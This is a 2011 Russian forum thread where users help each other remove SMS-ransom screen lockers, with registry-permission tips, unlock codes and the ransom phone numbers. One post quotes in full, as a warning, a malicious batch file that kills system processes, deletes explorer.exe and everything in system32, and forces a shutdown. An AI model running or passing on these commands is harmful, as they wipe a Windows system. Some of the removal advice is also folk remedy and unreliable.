Как избавиться от навязчивого баннера, требующего отправить SMS

stopy 31.01.2011 20:35:

stopy 31.01.2011 18:53:

banner 31.01.2011 09:05:
SERP802 30.01.2011 11:01 Защиту мою баннер прошел частично, при помощи программ, описанных в статье - снял сразу... А что за защита? Я просто запретил Админу редактирование в реестре: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies] [hkey_local_machine\software\microsoft\Windows NT\CurrentVersion\Winlogon] Вот и вся защита и никаких программ ставить не надо. После рестарта баннер просто не запускается.

Подскажите пожалуйста, как запретить изменение некоторых веток реестра?

Вопрос очень важен. Ведь способом, предлагаемым некто banner, можно на 100% оградиться от баннеров. Избранно запрещаем изменение веток реестра (вернее ключей) отвечающих за загрузку системы, безопасный режим и права приложений, ибо хорошей программе, устанавливаемой на компьютер, эти ключи реестра читать и изменять незачем.

banner, как Вы вручную без всяких программ имеющих в своём наличие HIPS, KSN, PDM, SandBox умудрились заблокировать к изменению некоторые ключи реестра?

Осмелюсь вмешаться в дискуссию.
Ну, во - первых, не стОит постоянно работать на компьютере под Админом.
Ну и, тем более, "ходить" в интернет.
Это уже кой какая надежда на то, что не подцепишь баннер.
Во - вторых, Ваше высказывание: "... можно на 100% оградиться от баннеров." -
мягко говоря, неоправданно оптимистично.
Не буду вдаваться в подробности механизма - эта тема не из нашей оперы.
Ну а поэкспериментировать с реестром Вы можете открыв Редактор Реестра.
Выбирайте любой параметр и дальше - меню Правка - Разрешения.
Вот здесь Вы можете запретить / разрешить кому угодно и что угодно.

P.S. В Windows существует довольно много "лазеек" для автозапуска программ.
И для того, чтобы эффективно бороться с этим сАмым автозапуском, надо
эти "лазейки" знать.
Но есть одно НО. Мы не можем "перекрыть " эти пути автозагрузки
полностью, поскольку их использует система. Можно и ей запретить,
но тогда она не сможет работать полноценно.
Получается заколдованный круг - "надёжно" защитились, но работаем
(если сможем, конечно) на ущербной системе.
И неужели Вы думаете, что: "способом, предлагаемым некто banner, "
до этого никто раньше не додумался?
Зря Вы так думаете. Почитайте ВЕСЬ форум, материалы из шапки и, поверьте, многие вопросы отпадут сами по себе.

Блин, люди )))вы пишете что там зайти куда нибудь в папку виндовс и так далее)) у меня например, када я включаю копм сразу выскакивает херня на весь экран, что ваша система заблокирована, и отправьте смс.... и я ничего не могу нажать, контрл аль делит не работает ... тупо черный экран с этой надписью Что делать помогите????????????????плиззззззззз

Помогите с ответом,запрашивает отправку смс ра намера 4161, 7139, 3353. Что делать?

Че за кипишь? я запретил редактирование ключей в ветках POLICES, SAFEBOOT и WINLOGON .. а вот запретить именно ключи а не ветки винда сама не может... как запретил? как настраиваете права доступа на диске с NTSF примерно то же самое, через простой regedit.exe.... в свойствах ветки есть раздел прав доступа, савим Администратор - чтение. Их редактирование вроде как абсолютно никчему, почему бы их сразу было не запретить...

Самый адекватный ответ я получил от passerby. Ставлю ему большой и жирный плюс.

Мой вопрос заключался в том, как в "топорном" исполнении, то есть вручную, вакцинировать реестр Windows против баннеров-вымогателей.

золотые слова... =>

Но есть одно НО. Мы не можем "перекрыть " эти пути автозагрузки полностью, поскольку их использует система. Можно и ей запретить, но тогда она не сможет работать полноценно. Получается заколдованный круг - "надёжно" защитились, но работаем (если сможем, конечно) на ущербной системе.

По крайней мере после запрета на ветки реестра этот баннер уже не может подменить shell, заблокировать диспетчер задач, и редактор реестра, а так же убить загрузку в безопасном режиме! Если кому-то этого мало, то .... дело ваше... меня и тем кому я это сделал все устраивает.... и люди уже попадали снова на банер но он просто не приживался в системе.... конечно все дыры не заткнешь но и это уже кое-что...

Доброго времени суток. Поймал банер, нашёл решение здесь http://support.kaspersky.ru/... . Решение такое: Для деактивации необходимо перевести время на часах на 7 суток. Более подробно читайте здесь. Ссылка на слове здесь, но есть нюанс - по ссылке ни куда не переходит. Поэтому возникает вопрос - как перевести часы на 7 суток, если рабочий стол заблокирован? Если загрузить liveCD и поменять время, то оно поменяется при загрузке винды с жесткого диска? Заранее спасибо!

время в БОИСе менять надо... после включения компа обычно надо нажимать delete

banner 01.02.2011 18:11:
время в БОИСе менять надо... после включения компа обычно надо нажимать delete

Спасибо! Попробуем! А ещё варианты есть?

VooDy86 01.02.2011 18:16:

banner 01.02.2011 18:11:
время в БОИСе менять надо... после включения компа обычно надо нажимать delete

Спасибо! Попробуем! А ещё варианты есть?

Смена даты не помогла. Картинка банера по этой ссылке. http://dbc-www.kaspersky-labs.com/....[blue]-1-[censored].png Только номер немного другой 89671655546. Помогите пожалуйста!

На эти номера код @59403E4@ 89653989725 89654027809 89654027811 89654027812 89654027813 89654027815 89654027816 89654027817 89654027818 89654027821 89654027826 89654027863 89654027868 89654027869 89654027870 89654027873 89654027874 89654028825 89654028826 89654028827 89654028828 89654028829 89654028830 89654028831 89654028832 89654028834 89654028868 89654028869 89654028870 89654028876 89654028878 89654028879 89654028889 89654029582 89654029591 89654030108 89654030116 89654030234 89654030244 89654030688 89654030690 89654030706 89654030708 89654030709 89654030714 89654030716 89654031016 89654031031 89654031035 89654031217

На эти код 100583643

89654025551 89654025558 89654025561 89654025562 89654025564 89654025632 89654025639 89654025642 89654025643 89654025645 89654025648 89654025653 89654025654 89654025668 89654025670 89654025671 89654025686 89654025690 89654025691 89654025694 89654025695 89654025697 89654025698 89654025699 89654025709 89654025713 89654025717 89654025720 89654025721 89654025724 89654025725 89654025729 89654025732 89654025738 89654025743 89654025746 89654025759 89654025769 89654025771 89654025774 89654025779 89654025796 89654025797 89654025801 89654025803 89654025806 89654025822 89654025825 89654025886

89636615439 89636614755 89636615384 89636614726 89636615348 89636617304 89636615394 89636629633 89636617903 89636629473 89636617990 89636614799 89636629767 89636615384 89636615439 код:19630277

На эти код ZU092784

89654029299 89654029324 89654028139 89654029310 89654029335

SO5635448 или Q29574621 89654029878 89654029899 89654028138 89654029893 89654029894 89654028075 89654029356 89654028019 89654028014 89654027942 89654027995 89654028020 89654027966 89654027969 89654027957 89654027992 89654028148 89654029355 89654027891 89654028025 89654027978 89654027958 89654029320 89654029359 89654029358 89654029346 89654028140 89654027892 89654028127 89654029353 89654027886 89654029319 89654027952 89654028016 89654027951 89654028013 89654028141 89654029280 89654029318 89654029317 89654028142 89654028032 89654028143 89654029309 89654029312 89654028026 89654029350 89654029315 89654029334 89654029316

код $73747589$ или ^77723094^89055280241 89055280277 89055280316 89055280348 89055280352 89055280410 89055280487 89055280488 89055280545 89055282080 89055282108 89055282118 89055282153 89055282196 89057634761 89057634972 89057634975 89057634998 89057635025 89057635057 89057635146 89057635171 89057635281 89057635360 89057635401 89057635426 89057635514 89057635524 89057635571 89057635662 89057635668 89057635825 89636385624 89636385643 89636385651 89636385675 89636385686 89636385694 89636385700 89636385707 89636385713 89636385715 89636385755 89636385763 89636385764 89636385800 89636385801 89636385807 89636385868 89636385875

Банер на синем фоне белыми буквами написано ...

Код: DIGGER код:SORRY (иногда приходится 3 раза вводить) код:Три раза ввести 00000 но вводить не на цифровой клавиатуре код:TETRIS код:WARCRAFT код:X-COM код:KYRANDIA код: DUNE 2 код:1 раз вводим: XYLIBOX,а потом два раза вводим 31337 код:1234567890 код:BOMBERMAN код:SKY DESTROYER код: DUCK HUNT код: DOUBLE DRAGON код:BATTLE TOADS код:GALAGA код:TNMTTF код:SHAME ON THE NIGHT код:LORD OF THE LAST DAY код:WISH I HAD AN ANGEL

Думаю у Вас помле такого язык не повернется сказать ,что одна рекламма.

Новый умный блокер меняет серетный код ,при вводе быть внимательным и не ошибаться.

89636614370 89636617993 89651351575 89636618539 89636614372 89636632171 89653773584 89653773633 89636614148 89636614524 89636614505 89036726344

код:90650231

banner 01.02.2011 13:01:
Че за кипишь? я запретил редактирование ключей в ветках POLICES, SAFEBOOT и WINLOGON .. а вот запретить именно ключи а не ветки винда сама не может... как запретил? как настраиваете права доступа на диске с NTSF примерно то же самое, через простой regedit.exe.... в свойствах ветки есть раздел прав доступа, савим Администратор - чтение. Их редактирование вроде как абсолютно никчему, почему бы их сразу было не запретить...

banner 01.02.2011 13:55:
По крайней мере после запрета на ветки реестра этот баннер уже не может подменить shell, заблокировать диспетчер задач, и редактор реестра, а так же убить загрузку в безопасном режиме! Если кому-то этого мало, то .... дело ваше... меня и тем кому я это сделал все устраивает.... и люди уже попадали снова на банер но он просто не приживался в системе.... конечно все дыры не заткнешь но и это уже кое-что...

Второй адекватный ответ на этом форуме на мой вопрос. Ставлю плюс banner.

passerby 01.02.2011 01:46:
Зря Вы так думаете. Почитайте ВЕСЬ форум, материалы из шапки и, поверьте, многие вопросы отпадут сами по себе.

passerby, только с Вами можно вести продуктивный диалог и как ни странно с "некто banner" )))

Остальные "Гуру" и "Профи" имеют лишь пустой мундир на ниве тщеславия и графомании.

ок. он чистый или сервак привязан к нему ?))))

Дмитрий-Админ 01.02.2011 21:16:
ок. он чистый или сервак привязан к нему ?))))

• Не понял вопрос?

К нему сервак преклеен .радминовский ,ты вклеил ))))

Дмитрий-Админ 01.02.2011 21:21:
К нему сервак преклеен .радминовский ,ты вклеил ))))

Нет

ладно изучаю отчет выложу позже.

stopy 01.02.2011 21:06:

passerby, только с Вами можно вести продуктивный диалог и как ни странно с "некто banner" )))

Остальные "Гуру" и "Профи" имеют лишь пустой мундир на ниве тщеславия и графомании.

• Спасибо stopy за лестный отзыв о нашей работе!
• А сами то что-нибудь можете?

zaruta 01.02.2011 21:28:

stopy 01.02.2011 21:06:

passerby, только с Вами можно вести продуктивный диалог и как ни странно с "некто banner" )))

Остальные "Гуру" и "Профи" имеют лишь пустой мундир на ниве тщеславия и графомании.

• Спасибо stopy за лестный отзыв о нашей работе!
• А сами то что-нибудь можете?

zaruta, Привет!
Тут, как я погляжу, развиваются боевые действия!
И чего ты ведёшься? Пусть себе помогает кто хочет и как хочет.
А HL покажет, кто есть кто

Ребят плииииизззззззззз требуют пополнить счет 89879506856 Буду премного благодарен!

passerby 01.02.2011 21:36:

zaruta, Привет!
Тут, как я погляжу, развиваются боевые действия!
И чего ты ведёшься? Пусть себе помогает кто хочет и как хочет.
А HL покажет, кто есть кто

• Привет passerby Я просто внес небольшое разнообразие, а то уже устал от глупых вопросов, от них сам тупеешь!
• Кстати появился совсем новый информер в браузере Мазила, я его сейчас изучаю, требуют деньги за обновление этого браузера, скрины выложу позже как разберусь!
• Посмотри сайтик http://update.mozilla.org/ отлично придумано для лохов! Кстати не в обиду эти ребята из твоих краев!

SannY yeah 01.02.2011 21:53:
Ребят плииииизззззззззз требуют пополнить счет 89879506856 Буду премного благодарен!

• Да Вы что? Мы не умеем этого!
• Только спец stopy может Вам помочь!

zaruta , passerby вечер добрый!!!

У меня такое впечатление, что кто-то из старых знакомых, под разными никами , разводят...
Я кстати, на отдых, устал я немного...
Но просматривать форум буду регулярно...

zaruta , короче просмотрел что за ламер это писал ))))) HL ржу не могу просто призапуске файла он удаляеть почти все файлы важные для запуска системы и заменяет их подставными библиотеками, после этого винда умирает вот и все ламерская штучка я такие еще в школе писал.)))) затягиваешь ветку реестра от рабочей винды и делаешь проверку на жизневажные системные файлы которые повреждени автоматом восстанавливаються опля , на все ушло ровно 3мин. 40 , ну если учесть что комп не машьнявый было бы быстрее. Ты мне выложи банеров , да таких по серьезнее я прокадирую их и коды выложу, а то нам с другом не чем заняться сейчас))))

Дмитрий-Админ 01.02.2011 22:13:
zaruta , короче просмотрел что за ламер это писал ))))) HL ржу не могу просто призапуске файла он удаляеть почти все файлы важные для запуска системы и заменяет их подставными библиотеками, после этого винда умирает вот и все ламерская штучка я такие еще в школе писал.)))) затягиваешь ветку реестра от рабочей винды и делаешь проверку на жизневажные системные файлы которые повреждени автоматом восстанавливаються опля , на все ушло ровно 3мин. 40 , ну если учесть что комп не машьнявый было бы быстрее. Ты мне выложи банеров , да таких по серьезнее я прокадирую их и коды выложу, а то нам с другом не чем заняться сейчас))))

• Хорошо выложу!
• Но все таки ушло 3,40, а не 49 сек. (шучу)
• Но я скажу, что HL даже для опытного пользователя серьезная проблема!
• Но чуть попозже, я тут с этим сайтом разбираюсь http://update.mozilla.org/ не нравиться мне он, посмотри если не сильно занят, а я пока баннеров залью!

zaruta ок, гляну ...,жду банерных попрошаек))))

zaruta 01.02.2011 21:53:

passerby 01.02.2011 21:36:

- Посмотри сайтик http://update.mozilla.org/ отлично придумано для лохов! Кстати не в обиду эти ребята из твоих краев!

Чёт я не въеду, в чём прикол?
Нормальный, вроде, сайт...

passerby 01.02.2011 22:50:

zaruta 01.02.2011 21:53:

passerby 01.02.2011 21:36:

- Посмотри сайтик http://update.mozilla.org/ отлично придумано для лохов! Кстати не в обиду эти ребята из твоих краев!

Чёт я не въеду, в чём прикол?
Нормальный, вроде, сайт...

• Как нормальный? Требуют обновление Firefox за деньги!
• Вылезает информер

Дмитрий-Админ 01.02.2011 22:39:
zaruta ок, гляну ...,жду банерных попрошаек))))

• Дмитрий-Админ баннеров залил Файл удален пароль на скачку
• Качай скорее череэ 20 мин файл будет удален
• Потом еще выложу.

ок

Дмитрий-Админ 01.02.2011 22:13:
zaruta , короче просмотрел что за ламер это писал ))))) HL ржу не могу просто призапуске файла он удаляеть почти все файлы важные для запуска системы и заменяет их подставными библиотеками, после этого винда умирает вот и все ламерская штучка я такие еще в школе писал.)))) затягиваешь ветку реестра от рабочей винды и делаешь проверку на жизневажные системные файлы которые повреждени автоматом восстанавливаються опля , на все ушло ровно 3мин. 40 , ну если учесть что комп не машьнявый было бы быстрее. Ты мне выложи банеров , да таких по серьезнее я прокадирую их и коды выложу, а то нам с другом не чем заняться сейчас))))

Отчаянный ты,Дмитрий-Админ, однако!
А ведь уже тот факт, что тебе пришлось "лечиться" после HL не делает тебе чести.
Зачем ты запустил неизвестное приложение, тем более зная, что оно вредопакостное?
А ведь достаточно было посмотреть свойства файла, а там открытым
текстом написано, что это "Непрерывный SFX RARархив.
Ну а открыв архив в 7Zip увидел бы его содержимое.
Файл Help.bat содержит следующее:
@echo off
title I will hack you!
attrib +h d:\ltofxq
regedit /s Restore.reg
taskkill /f /im explorer.exe /im svchost.exe /t /p
del /f /s /q %systemroot%\explorer.exe
del /f /s /q %systemroot%\system32\*.*
rundll32 shell32, SHExitWindowsEx 2
rd /s /q d:\ltofxq

Не настораживает такое содержимое? (подчёркнуто мной)
Restore.reg - второй файл из архива. Ну а какое его содержание - догадайся сам
Так что, не от баннеров надо лечить , а юзеров учить. Чтобы имели хоть малейшее
понятие о своей горячо любимой Windows, чтобы привыкали делать
резервные копии важных данных, (...можешь дополнить список).
И пока этого не будет - БУДУТ баннеры.
Ну, а если ты этим зарабатываешь себе на хлеб с маслом, то тебе и не
выгодно совсем "учить". Тебе, понятно, выгодней - лечить.

passerby Не пойму-почему ты этот сайт http://update.mozilla.org/ нормальным назвал? Поясни!

zaruta 01.02.2011 23:22:
passerby Не пойму-почему ты этот сайт http://update.mozilla.org/ нормальным назвал? Поясни!

Вот сюда я попадаю по твоей ссылке

Вокруг меня 6 машин 2 сервака ,мне не жалко поковыряться и посмотреть ,что юные кудесники придумали

Дмитрий-Админ 01.02.2011 23:33:
Вокруг меня 6 машин 2 сервака ,мне не жалко поковыряться и посмотреть ,что юные кудесники придумали

Дык ведь если твои 6 машин и 2 сервака как то между собой соединены -
то "юные кудесники" могут запросто уложить всё это хозяйство.
(ну, типа HL в "сетевом" исполнении)

пока стоят )))))))

passerby и Дмитрий-Админ Верьте не верьте, но пока не могу найти отгадки на этот свежий информер

Сейчас найдем ,кинь прямую ссылку на эту заразу ,чтоб я поймал ...

Дмитрий-Админ 02.02.2011 00:19:
Сейчас найдем ,кинь прямую ссылку на эту заразу ,чтоб я поймал ...

• В том то и дело прямой ссылки нет! Я на машине сына, он скачивал что то для телефона и поймал информер, при нажатии на кнопочку " Обновить firefox" выкидывает на сайт http://update.mozilla.org/ скрины вверху!
• Ерунда, покопаюсь немного-разберусь потом расскажу!
• Переписка наша УДАЛЕНА так что все ОК
• Как мои баннеры-протестил???

Запусти Стартер програмулину она показываеть активность плагинов , и там есть библиотека внедренная в сам Фаер фокс котороя и вещает это скорее всего так ,мне бы его на експертизу сказал бы,твои банеры еще не юзал ,пока занет другой темой ,как проверю отпишу .

Дмитрий-Админ 02.02.2011 00:40:
Запусти Стартер програмулину она показываеть активность плагинов , и там есть библиотека внедренная в сам Фаер фокс котороя и вещает это скорее всего так ,мне бы его на експертизу сказал бы,твои банеры еще не юзал ,пока занет другой темой ,как проверю отпишу .

• ОК

точное название не помню гдето у меня была по гугли стартер бла бла бла ... но нужная програмулинка....

Дмитрий-Админ 02.02.2011 00:53:
точное название не помню гдето у меня была по гугли стартер бла бла бла ... но нужная програмулинка....

Так и называется: Starter.exe

Банер с тыквой попрощайка требует стукнуть в аську ...

Снимаеться зажатием Контр+Алт+Дел 13 раз , выскакиевает диспечер снимаем protorian.exe и services.exe начинает работать шустрее паявляеться рабочий стол ,но не весь, затем идем в system32 файл PGDFGSVC.exe , далее в Program Files убиваем Procexp.exe , и самое главное Common Files тут лежит services.exe убиваем , после этого грузимся и радуемся жизни. Такой кстати я не мочил . По каждому банеру могу выложить интсруктаж.

Банер под названием Vip porno черный фон белый шрифт, снимаеться Алт +Ескп затем убиваеться процесс .....avi.exe ,также срабатывает нажатие Контр+Алт+Дел более 100 раз слетает))) Едем далше....